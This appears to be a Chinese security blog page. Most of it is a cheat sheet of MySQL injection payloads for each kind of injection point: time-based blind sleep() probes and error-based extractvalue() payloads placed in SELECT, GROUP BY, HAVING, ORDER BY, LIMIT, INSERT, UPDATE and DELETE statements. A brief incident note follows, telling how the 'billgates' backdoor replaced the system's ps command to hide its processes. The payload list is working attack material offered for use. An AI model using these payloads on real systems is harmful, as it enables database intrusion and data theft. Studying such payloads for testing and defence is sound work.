mysql各种注入点盲注/报错利用方法

1.select
(1)”select “.$sqli.” from test_1 where id=1;”
select name and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) from test_1 where id=1;
select name or extractvalue(1,concat(0x7e,(select user()))) from test_1 where id=1;
(2)”select name from “.$sqli.”_1 where id=1;”
select name from (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a)b_1 where id=1;
(3)”select name from test_”.$sqli.” where id=1;”
select name from test_1,(select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a where id=1;
(4)”select name from test_1 where id=”.$sqli.”;”
select name from test_1 where id=1 and if(ascii(substr((select user()),1,1))=114,sleep(2),0);
select name from test_1 where id=1 or extractvalue(1,concat(0x7e,(select user())));
(5)”select name,pass from test_1 where id=1 group by “.$sqli.”;”
select name,pass from test_1 where 1=1 group by name and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name,pass from test_1 where 1=1 group by name or extractvalue(1,concat(0x7e,(select user())));
(6)”select name,pass from test_1 where id=1 group by name asc “.$sqli.”;”
select name,pass from test_1 where 1=1 group by name asc,(select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name,pass from test_1 where 1=1 group by name asc,extractvalue(1,concat(0x7e,(select user())));
(7)”select name,pass from test_1 where id=1 group by name asc having name='”.$sqli.”‘;”
select name,pass from test_1 where id=1 group by name asc having name=’tttt’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′;
select name,pass from test_1 where id=1 group by name asc having name=’tttt’ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′;
(8)”select name,pass from test_1 where id=1 group by name asc having name=’tttt’ order by “.$sqli.”;”
select name from test_1 where id=1 order by 1 and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name from test_1 where id=1 order by 1 or extractvalue(1,concat(0x7e,(select user())));
(9)”select name,pass from test_1 where id=1 group by name asc having name=’tttt’ order by 1 asc “.$sqli.”;”
select name from test_1 where id=1 order by 1 asc,(select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name from test_1 where id=1 order by 1 asc,extractvalue(1,concat(0x7e,(select user())));
(10)”select name,pass from test_1 where id=1 group by name asc having name=’name’ order by 1 asc limit 1,”.$sqli.”;”
select name,pass from test_1 where id=1 order by name limit 1,1 procedure analyse(extractvalue(1,concat(0x7e,user())),1);
2.insert/update/delete
(1)”insert into test_1(name, pass) values(‘tttt’, ‘”.$sqli.”‘);”)
insert into test_1(name,pass) values(‘tttt’,’1′ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′);
insert into test_1(name,pass) values(‘tttt’,’1′ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′);
(2)”update test_1 set pass='”.$sqli.”‘ where name=’tttt’;”
update test_1 set pass=’pass’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′ where name=’tttt’;
update test_1 set pass=’pass’ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′ where name=’tttt’;
(3)”update test_1 set pass=’pass’ where name='”.$sqli.”‘;”
update test_1 set pass=’pass’ where name=’pass’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′;
update test_1 set pass=’pass’ where name=’pass’ or extractvalue(1,concat(0x7e,(select user())));
(4)”delete from test_1 where name='”.$sqli.”‘;”
delete from test_1 where name=’tttt’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′;
delete from test_1 where name=’tttt’ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′;

系统命令被替换

前几天的一次应急,客户漏洞没有及时修,短短几天就又被搞了。

查的时候看到几个异常连接,找到了对应的进程,结束掉之后发现还能抓到往攻击者IP发的包,但进程就是看不到,很神奇。

在老司机的指点下,看了下/bin/ps,原来被攻击者替换掉了。

和队友一起把这个假的ps拿出来分析了一下,发现似乎是网上可以找到的名为billgates的后门,其中就有替换netstat、ps、lsof等系统命令的功能。

链接:http://sec.chinabyte.com/213/13664713.shtml